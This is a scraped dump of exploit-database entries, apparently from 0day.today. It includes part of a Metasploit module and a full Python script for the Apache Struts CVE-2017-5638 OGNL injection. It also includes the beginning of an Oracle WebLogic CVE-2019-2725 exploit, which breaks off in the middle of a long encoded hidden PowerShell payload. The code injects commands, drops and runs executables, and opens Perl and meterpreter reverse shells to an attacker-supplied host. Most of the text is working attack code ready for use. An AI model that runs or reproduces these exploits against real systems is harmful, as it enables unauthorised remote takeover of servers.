OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vunlerability in Apache Struts\r\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\r\n via http Content-Type header.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n 'Author' => [\r\n 'Nike.Zheng', # PoC\r\n 'Nixawk', # Metasploit module\r\n 'Chorder', # Metasploit module\r\n 'egypt', # combining the above\r\n 'Jeffrey Martin', # Java fu\r\n ],\r\n 'References' => [\r\n ['CVE', '2017-5638'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Universal', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Mar 07 2017',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])\r\n ]\r\n )\r\n\r\n @data_header = \"X-#{rand_text_alpha(4)}\"\r\n end\r\n\r\n def check\r\n var_a = rand_text_alpha_lower(4)\r\n\r\n ognl = \"\"\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|\r\n\r\n begin\r\n resp = send_struts_request(ognl)\r\n rescue Msf::Exploit::Failed\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if resp && resp.code == 200 && resp.headers[var_a]\r\n vprint_good(\"Victim operating system: #{resp.headers[var_a]}\")\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n #when ARCH_JAVA\r\n # datastore['LHOST'] = nil\r\n # resp = send_payload(payload.encoded_jar)\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload(generate_payload_exe)\r\n end\r\n\r\n require'pp'\r\n pp resp.headers if resp\r\n end\r\n\r\n def send_struts_request(ognl, extra_header: '')\r\n uri = normalize_uri(datastore[\"TARGETURI\"])\r\n content_type = \"%{(#_='multipart/form-data').\"\r\n content_type << \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\"\r\n content_type << \"(#_memberAccess?\"\r\n content_type << \"(#_memberAccess=#dm):\"\r\n content_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\r\n content_type << \"(#ognlUtil=#container.getInstance(@[email\u00a0protected])).\"\r\n content_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\"\r\n content_type << \"(#ognlUtil.getExcludedClasses().clear()).\"\r\n content_type << \"(#context.setMemberAccess(#dm)))).\"\r\n content_type << ognl\r\n content_type << \"}\"\r\n\r\n headers = { 'Content-Type' => content_type }\r\n if extra_header\r\n headers[@data_header] = extra_header\r\n end\r\n\r\n #puts content_type.gsub(\").\", \").\\n\")\r\n #puts\r\n\r\n resp = send_request_cgi(\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')\r\n end\r\n resp\r\n end\r\n\r\n def execute_command(cmd)\r\n ognl = ''\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n\r\n # You can add headers to the server's response for debugging with this:\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('decoded',#cmd)).|\r\n\r\n ognl << %q|(#[email\u00a0protected]@getProperty('os.name')).|\r\n ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start())|\r\n\r\n send_struts_request(ognl, extra_header: cmd)\r\n end\r\n\r\n def send_payload(exe)\r\n\r\n ognl = \"\"\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{@data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{rand_text_alpha(4)}','.exe')).|\r\n #ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|\r\n #ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|\r\n\r\n # Using stuff from the sun.* package here means it likely won't work on\r\n # non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to\r\n # work and I don't see a better way of getting binary data onto the\r\n # system. =/\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|\r\n ognl << %q|(#fos.write(#d)).|\r\n ognl << %q|(#fos.close()).|\r\n\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete())|\r\n\r\n send_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\"))\r\n end\r\n\r\nend\r\n\r\n=begin\r\nDoesn't work:\r\n\r\n ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|\r\n ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|\r\n ognl << %q|(#[email\u00a0protected]@getMethods(#c,'main',true).get(0)).|\r\n ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|\r\n ognl << %q|(#m.invoke(null,null)).|\r\n\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.Object'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('java.lang.String'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',@[email\u00a0protected]('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('java.lang.String')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.Object')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('java.lang.String')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.Object;')})).|\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@[email\u00a0protected]('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n #ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed\r\n #ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: [email\u00a0protected]\r\n\r\n=end\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27316", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-20T03:15:54", "description": "Apache Struts 2 versions 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 remote code execution exploit that provides a reverse shell.#### Usage Info\nTested with tomcat8\r Install tomcat8\r Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r Ex:\r Open: $ nc -lnvp 4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'", "cvss3": {}, "published": "2017-03-12T00:00:00", "type": "zdt", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-12T00:00:00", "id": "1337DAY-ID-27300", "href": "https://0day.today/exploit/description/27300", "sourceData": "# CVE-2017-5638\r\n# Apache Struts 2 Vulnerability Remote Code Execution\r\n# Reverse shell from target\r\n# Author: anarc0der - github.com/anarcoder\r\n# Tested with tomcat8\r\n\r\n# Install tomcat8\r\n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638\r\n\r\n# Ex:\r\n# Open: $ nc -lnvp 4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --test\r\n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --cmd='uname -a'\r\n\r\n\r\n\"\"\"\r\nUsage:\r\n struntsrce.py --target=<arg> --test\r\n struntsrce.py --target=<arg> --cmd=<arg>\r\n struntsrce.py --target=<arg> --ip=<arg> --port=<arg>\r\n struntsrce.py --help\r\n struntsrce.py --version\r\nOptions:\r\n -h --help Open help menu\r\n -v --version Show version\r\nRequired options:\r\n --target='url target' your target :)\r\n --test check if target is vulnerable or not\r\n --cmd='uname -a' your command to execute in target\r\n --ip='10.10.10.1' your ip\r\n --port=4444 open port for back connection\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport httplib\r\nimport os\r\nimport sys\r\nfrom docopt import docopt, DocoptExit\r\n\r\n\r\nclass CVE_2017_5638():\r\n\r\n def __init__(self, p_target):\r\n self.target = p_target\r\n # self.ip = p_ip\r\n # self.port = p_port\r\n # self.exploit()\r\n\r\n def generate_revshell(self, p_ip, p_port):\r\n revshell = \"perl -e \\\\'use Socket;$i=\\\"{0}\\\";$p={1};\"\\\r\n \"socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));\"\\\r\n \"if(connect(S,sockaddr_in($p,inet_aton($i)))){{open\"\\\r\n \"(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");\"\\\r\n \"open(STDERR,\\\">&S\\\");exec(\\\"/bin/sh -i\\\");}};\\\\'\"\r\n return revshell.format(p_ip, p_port)\r\n\r\n def generate_payload(self, p_cmd):\r\n payload = \"%{{(#_='multipart/form-data').\"\\\r\n \"(#[email\u00a0protected][email\u00a0protected]_MEMBER_ACCESS).\"\\\r\n \"(#_memberAccess?\"\\\r\n \"(#_memberAccess=#dm):\"\\\r\n \"((#container=#context['com.opensymphony.xwork2.\"\\\r\n \"ActionContext.container']).\"\\\r\n \"(#ognlUtil=#container.getInstance(@com.opensymphony.\"\\\r\n \"[email\u00a0protected])).\"\\\r\n \"(#ognlUtil.getExcludedPackageNames().clear()).\"\\\r\n \"(#ognlUtil.getExcludedClasses().clear()).\"\\\r\n \"(#context.setMemberAccess(#dm)))).\"\\\r\n \"(#cmd='{0}').\"\\\r\n \"(#iswin=(@[email\u00a0protected]('os.name').\"\\\r\n \"toLowerCase().contains('win'))).\"\\\r\n \"(#cmds=(#iswin?{{'cmd.exe','/c',#cmd}}:\"\\\r\n \"{{'/bin/bash','-c',#cmd}})).\"\\\r\n \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\\\r\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).\"\\\r\n \"(#ros=(@[email\u00a0protected]\"\\\r\n \"Response().getOutputStream())).\"\\\r\n \"(@[email\u00a0protected]\"\\\r\n \"(#process.getInputStream(),#ros)).(#ros.flush())}}\"\r\n return payload.format(p_cmd)\r\n\r\n def send_xpl(self, p_payload):\r\n body = ''\r\n try:\r\n # Set proxy for debug request, just uncomment these lines\r\n # Change the proxy port\r\n\r\n #proxy = urllib2.ProxyHandler({'http': '127.0.0.1:8081'})\r\n #opener = urllib2.build_opener(proxy)\r\n #urllib2.install_opener(opener)\r\n\r\n headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64)'\r\n ' AppleWebKit/537.36 (KHTML, like Gecko)'\r\n ' Chrome/55.0.2883.87 Safari/537.36',\r\n 'Content-Type': p_payload}\r\n xpl = urllib2.Request(self.target, headers=headers)\r\n body = urllib2.urlopen(xpl, timeout=5).read()\r\n except httplib.IncompleteRead as b:\r\n body = b.partial\r\n except:\r\n pass\r\n return body\r\n\r\n def os_detect(self):\r\n cmd = 'uname'\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n if 'Linux' in resp or 'Darwin' in resp:\r\n print '[+] Unix-like OS system detected.\\n'\r\n else:\r\n print '[+] Windows OS system detected.\\n'\r\n\r\n def test_vuln(self):\r\n cmd = 'hacked'\r\n print '\\n[+] Testing ' + self.target\r\n resp = self.send_xpl(self.generate_payload(cmd))\r\n tags = ['<html', '<head', '<body', '<script', '<div']\r\n if any(tag not in resp.lower() for tag in tags) and cmd in resp:\r\n print '[+] Target possibly vulnerable'\r\n print '[+] Finger printing OS system..'\r\n self.os_detect()\r\n else:\r\n print '[-] Target not vulnerable\\n'\r\n sys.exit(0)\r\n\r\n def exec_cmd(self, p_cmd):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Executing: {0}\\n\\n'.format(p_cmd)\r\n resp = self.send_xpl(self.generate_payload(p_cmd))\r\n print resp\r\n\r\n def exec_revshell(self, p_ip, p_port):\r\n print '\\n[+] Target: {0}'.format(self.target)\r\n print '[+] Dont forget to listen on port: {0}'.format(p_port)\r\n print '[+] Attempting reverse shell...\\n'\r\n\r\n self.send_xpl(self.generate_payload(\r\n self.generate_revshell(p_ip, p_port)))\r\n\r\n\r\ndef main():\r\n try:\r\n arguments = docopt(__doc__, version=\"Apache Strunts RCE Exploit\")\r\n target = arguments['--target']\r\n test = arguments['--test']\r\n cmd = arguments['--cmd']\r\n ip = arguments['--ip']\r\n port = arguments['--port']\r\n\r\n except DocoptExit as e:\r\n os.system('python2 struntsrce.py --help')\r\n sys.exit(1)\r\n\r\n x = CVE_2017_5638(target)\r\n if test:\r\n x.test_vuln()\r\n if cmd:\r\n x.exec_cmd(cmd)\r\n if ip and port:\r\n x.exec_revshell(ip, port)\r\n\r\n\r\nif __name__ == '__main__':\r\nmain()\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/27300", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-01T19:54:17", "description": "Exploit for windows platform in category web applications", "cvss3": {}, "published": "2019-05-01T00:00:00", "type": "zdt", "title": "Oracle #Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution Exploit #RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T00:00:00", "id": "1337DAY-ID-32626", "href": "https://0day.today/exploit/description/32626", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\r\n# Date: 30/04/2019\r\n# Exploit Author: Avinash Kumar Thapa\r\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\r\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\r\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\r\n# Tested on:\r\n\t#OS: Windows 2012 R2 (Build 9600).\r\n\t#Architecture : x64\r\n\t#System Language : en_US\r\n\r\n\r\n# CVE : CVE-2019-2725\r\n\r\n\r\n# Script Usage:\r\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\r\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\r\n# Add the powershell command in the variable\r\n\r\n__author__ = \"Avinash Kumar Thapa\"\r\n__description__ = \"\"\"\r\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\r\n\r\nCREDIT STATEMENT:\r\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\r\n\r\nBadcode of Knownsec 404 Team: CVE-2019-2725\r\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\r\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\r\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\r\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\r\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\r\nZengShuai Hao: CVE-2019-2725\r\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\r\n\r\n\"\"\"\r\n\r\nimport requests\r\nimport sys\r\n\r\nprint \"Exploit Written by Avinash Kumar Thapa\"\r\n\r\n\r\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABQAFcAeAAxAHcAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAagA5AEQAMQBhAEYAWgBGAHMAaABHAEIATABhAE4ASgBFAHEAMwBaAHAAWABVADUAeQBZAE8AQgBBAEkAaAAwADQAYgBlADIAMgBXAHIATAAzAEUAWABoAE8AZwAxAC8AOQArAHMAMgBDAG4ANgBUAFcAdAAyAHAAUABPADQAbQBWAGYAWgBtAFoAbgBuAG4AbABtADEAawBFAFcAZQA0AEwAeQBXAEYAawBzAHUAZgBMADUAegBlAEcAQgBnAHgATQBjAEsAVgBvAHAAYQBrADMASwBTAG0AbgBWAGEANQArAG0AKwBzAEUAQgBiAEoAUgBXAFYAawBmADUAcQBHAGgAVAB0AEYAdwAyAGUAWQBSAHAAUABMAHUANABhAEcAUgBKAFEAbQBLAHgAbgAxAGMANgBSAEsAQQAwAEoAZABFADkAbwB5AFQAVgBkAE8AVgB2ADUAWABaAE8ARQBuAEoAOABkAGIAOABnAG4AbABBACsASwA2AFcALwBLAGgAMwBHADcAegBIAEwAeABUAFkATgA3AE0AMgBKAGMAbwB4AGkAWAArADcAMQB1AFkAZQBsAE0AeABWADMAeQBhAGoAUQAxAEQALwAvAFYAUABYAHAAYwBXADEAVwBhAFQAMQBtAG0ASwBXAGEANgBtADUAUwBRAGEASwBLAHoANQBpAHEASwAxADkAMABlAGUARABOAFoAawBrADAAMQBhAFoAZQB3AGwATQBlAGkATQBvAHQAagBVADkAUABLAHMATQA0AHgAUQBHADUAQgBHAHMAcgBZAGgATQB4ADUAMwA2AHEANgBoAEEARQBmAEIASQBpAHMAaQBSAFcAWgBEAGgAUwBmADcAKwByAHEAVABCADAARQB1ADQAaAAzADAAOQBJAG0AcQBwAGwAWgBTAG8AdABUADIAZQB6AFAANwBSAHAAZgB1AHgAMQBGAGcAcwBhAGsAWQBvAFYAQwA1AEwAdwBwAFUAdQBTAEYAZgBWAEkAVwB1AG4AaQAyAEcAZgBrAG0AZwBRAHoAMABIAEoARgBRAHUATgB3AHAAdQBzAGcAdAB1AEkAUABSAEMAdgBGAEcAVwBOAGwANQBYAGYATQBhAEoAZgBrAHEAUQBEAHQAVgA1AFcAMABsADAAbwBnADUAWQBoAEUATAAwAE0AZQB2AHcALwBUADUAbgA3AEcAeQBGADUAUgBmAGMAVgBQAG0AWABvAGQAbgB1AGYAMABBADMAQgBmADMAaAB5ACsATwBRAHcASwByAHAARAB6AGwAMQBTAEIAMABjAEYAMABOAHkAYgBnAG0AKwBiAHcAbABPADYAawBQAGkAcgBWAHMAbQBMAEQATQBWAGoAdwBaAEEAUABUADAAawAyAFMARQBYADMAMgBqAEsAeABTAFMAcwBmAE4AKwAvAEsAUAA5AFcAdQBGAE0ASQBnAFMAdgB3ADgAcgAwAHgARwBuAC8AZwB3ADAAOABtAFMAVwA4AEwAZwBwAGwAMwAvAE0AeQBTAFkASgBhAEUAeQBhAG0AeABoAEgAMQBDAHQAbwBwADcAMgBHAE0AQQBrAFkAMgBjAFYAWABLAGMAUQB1AHcAUwBWAE4AegBUAGUASQAzAHkAUwBNAGgARgBoAEkAMABHAFMAaQB2ADEATgByAFIAVgBRADgANgA1AG8AWgBaAFQANQBKAGsAQQBkAFoAUwBzAEUAcgBTAEsARAArAHIAVABQADcAUABHAGkAcQBGAGQAcwBrAEEAbwBUADIAYwAyAEIAZQBLAFEAQwB5AGsAMABJADYASgAvAGkAbQBPAEYAMwBPAFEAVQBoAHQATQBKAHkAbQBaAGMAWABKAG8ATgBxADgAcwB1AEkAUwB6AEkAaABmAFYAbABDAGMAMABuAHcATABaAFkATAB2AGgAdQBwAFgAZAArADIATQBDAGUAcgBoAFYAQgBUAG0AWgBuAG8ATwBZADMANQBjAGcAOABlAHAAUwBEAEkAUABjAGcAYQBoADMANwBoAEwANABsAEgATQBKAEIASgBsAHAAVQB0ADkAWQBtADUAYwBHAGgAYgBIAHEAcQAvAGkAMABNAEMATQBRAFEAMgBBAHAAUgBYAGsAQQBWAFoAawAvAEsANgBRAFQARQBqAEEAdwAxADMAVwA5AFkAcABMAGgAQgBVAHQARwBZAGwAQQBaAGwAZgAxAGIAWQBaAEQAcQBQAEcAYwA2AFQAdgBxADQASgBEADQANgByADgAYwBMAEoAaQA4AHAANgAxAEUAbwBvAEQAZwBoAFgAdQBRAFgAcABkAHgAVQBWAFoARwBOAEIASABRAE8AeQBTAHEAdwBLAEQALwBkAHYAaQBMAHAAaQBIAGQAYQBDAFEAawBUADQATgBXAFYATQBiAFUAMwBBAGoASgA2AE4ASwBXAGUAcQAyADEASgBHAFMATwB5AGcANgBEAFIARQBEADgANwBZAFIASABKAGsANwBKACsALwBxACsAUQAyAGgAdgBqAFMAdgBhAFEAUABCAE0AcgBKAGoAWgBuAHYAbABBAGEAKwBpAEoAMQBpAHcAYgB2AGsATgA2AGEAdgBIAG0AbQBmACsAcAB0ACsAZwBhAFMAWABNADkARAA1AEMAVgBXAG4AYgBYAGEAUQA2ADYAMwBmAHEAcQA1ADQANwBxAHcAbQAxAFoANABwAE4AagBDAGIAcwAxAFgAaQB4AGMAMQBMADAAZQBUAHMAUwBkAGgAYgBvADMAdABQAG8AdwBxAFcAKwBYAFAAYgBwADEAKwA4AGkAZgByAEkAMwAzAFcAMwBQADcAVgBEAFgAWAAyADAAWABvAEIANQBOAG0ARQBJAFIAbgBnAFgAdABkAGUAOQBlAG0ALwBkAHYARwB3AEsAeQBlADQASAA2AHoAbABmAFYAdgB6AFMAZQB6AFcAawA5AGIAOQBLAGsANwBvAE0AUABCAFEANgA4AHQANwBpAGMAagBoAG8AZQBCAEUAWQA1AHIANQA1AGkAdQArADgAbABpAFYATwBQADIAMQBrAEsAbwBNAHoALwAxAHQAcgAxAGcAMQBKAG4AYgAvAG0AYgBTAHAAVwBSAGgAVgBQAHQAMABnAEEAWQBJAGYAZgBLAHUAaAA4AE4ATwB1AEEAdwA3AEsAVABMAE8AUgA0ACsATgBLAEcAeQBPAEgAVwBlAEIAawBZAFYAYQBvADAAMwB2AEgAVABNAEgAdwA3AGEASgBoAGkAMQB6AGcASwArADQAYwAzAHIAVQBOAEcAcAAzAC8AbQBPAHIAZgBUAGYARwB2AFkAagA1AG4AYQA1AFIAbQA0AHkAUgBqAHgATABqAEoAcAB6AFgAegBxADcAbQBzAGMAUQBKAGgAKwBhAGoASwBXAFYAUQAvADIANwBUAE4AawBEAEcAcQBhAE4A